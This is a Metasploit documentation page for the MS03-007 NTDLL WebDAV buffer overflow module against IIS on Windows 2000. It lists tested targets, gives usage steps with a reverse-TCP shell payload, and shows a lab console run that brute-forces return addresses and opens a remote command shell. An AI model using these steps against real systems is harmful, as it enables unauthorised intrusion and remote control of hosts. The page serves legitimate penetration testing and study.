adam/metasploit-gs
1
0
Fork 0
Code Issues Pull Requests Actions Packages Projects Releases Wiki Activity
Files
3da170a43c7f288fe9bc88fe325da488733acac3
metasploit-gs/documentation/modules/exploit/windows/iis/ms03_007_ntdll_webdav.md
T

Ignoring revisions in .git-blame-ignore-revs. Click here to bypass and see the normal blame view.

106 lines
3.3 KiB
Markdown
Raw Normal View History

ms03_007_ntdll_webdav: Cleanup and add additional offsets
2022-07-07 20:31:57 +10:00
## Vulnerable Application
This exploits a buffer overflow in NTDLL.dll on Windows 2000
through the SEARCH WebDAV method in IIS. This particular
module only works against Windows 2000. It should have a
reasonable chance of success against SP0 to SP3.
This module has been tested successfully on:
* Windows 2000 Professional SP0 (EN)
* Windows 2000 Professional SP0 (FI)
* Windows 2000 Professional SP0 (NL)
* Windows 2000 Professional SP0 (TR)
* Windows 2000 Professional SP1 (AR)
* Windows 2000 Professional SP1 (CZ)
* Windows 2000 Professional SP1 (EN)
* Windows 2000 Professional SP2 (EN)
* Windows 2000 Professional SP2 (FR)
* Windows 2000 Professional SP2 (PT)
* Windows 2000 Professional SP3 (EN)
* Windows 2000 Server SP0 (DE)
* Windows 2000 Server SP0 (EN)
* Windows 2000 Server SP0 (ES)
* Windows 2000 Server SP0 (FR)
* Windows 2000 Server SP0 (HU)
* Windows 2000 Server SP0 (NL)
* Windows 2000 Server SP0 (PT)
* Windows 2000 Server SP0 (TR)
* Windows 2000 Server SP1 (EN)
* Windows 2000 Server SP1 (SE)
* Windows 2000 Server SP2 (EN)
* Windows 2000 Server SP2 (RU)
* Windows 2000 Server SP3 (DE)
* Windows 2000 Server SP3 (IT)
## Verification Steps
1. `use exploit/windows/iis/ms03_007_ntdll_webdav`
1. `set RHOSTS [IP]`
1. `set PAYLOAD windows/shell/reverse_tcp`
1. `set LHOST [IP]`
1. `run`
## Options
## Scenarios
### Windows 2000 Professional SP1 (EN)
```
msf6 > use exploit/windows/iis/ms03_007_ntdll_webdav
[*] Using configured payload windows/shell/reverse_tcp
msf6 exploit(windows/iis/ms03_007_ntdll_webdav) > set rhosts 192.168.200.195
rhosts => 192.168.200.195
msf6 exploit(windows/iis/ms03_007_ntdll_webdav) > set lhost 192.168.200.130
lhost => 192.168.200.130
msf6 exploit(windows/iis/ms03_007_ntdll_webdav) > check
[+] 192.168.200.195:80 - The target is vulnerable. We've hit a server error (exception)
msf6 exploit(windows/iis/ms03_007_ntdll_webdav) > run
[*] Started reverse TCP handler on 192.168.200.130:4444
[*] Trying return address 0x004e004f (1 / 88)...
[-] Attempt failed: Connection reset by peer
[*] Checking if IIS is back up after a failed attempt...
[-] Connection failed (1 of 20)...
[-] Connection failed (2 of 20)...
[-] Connection failed (3 of 20)...
[-] Connection failed (4 of 20)...
[*] Trying return address 0x00ce004f (2 / 88)...
[-] Attempt failed: Connection reset by peer
[*] Checking if IIS is back up after a failed attempt...
[-] Connection failed (1 of 20)...
[-] Connection failed (2 of 20)...
[*] Trying return address 0x00ce0041 (3 / 88)...
[-] Attempt failed: Connection reset by peer
[*] Checking if IIS is back up after a failed attempt...
[-] Connection failed (1 of 20)...
[-] Connection failed (2 of 20)...
[-] Connection failed (3 of 20)...
[-] Connection failed (4 of 20)...
[*] Trying return address 0x00430041 (4 / 88)...
[-] Attempt failed: Connection reset by peer
[*] Checking if IIS is back up after a failed attempt...
[-] Connection failed (1 of 20)...
[-] Connection failed (2 of 20)...
[*] Trying return address 0x00b40041 (5 / 88)...
[*] Encoded stage with x86/shikata_ga_nai
[*] Sending encoded stage (267 bytes) to 192.168.200.195
[*] Command shell session 1 opened (192.168.200.130:4444 -> 192.168.200.195:1066) at 2022-07-07 06:13:21 -0400
Shell Banner:
Microsoft Windows 2000 [Version 5.00.2195]
-----
C:\WINNT\system32>ver
ver
Microsoft Windows 2000 [Version 5.00.2195]
C:\WINNT\system32>
```
Reference in New Issue Copy Permalink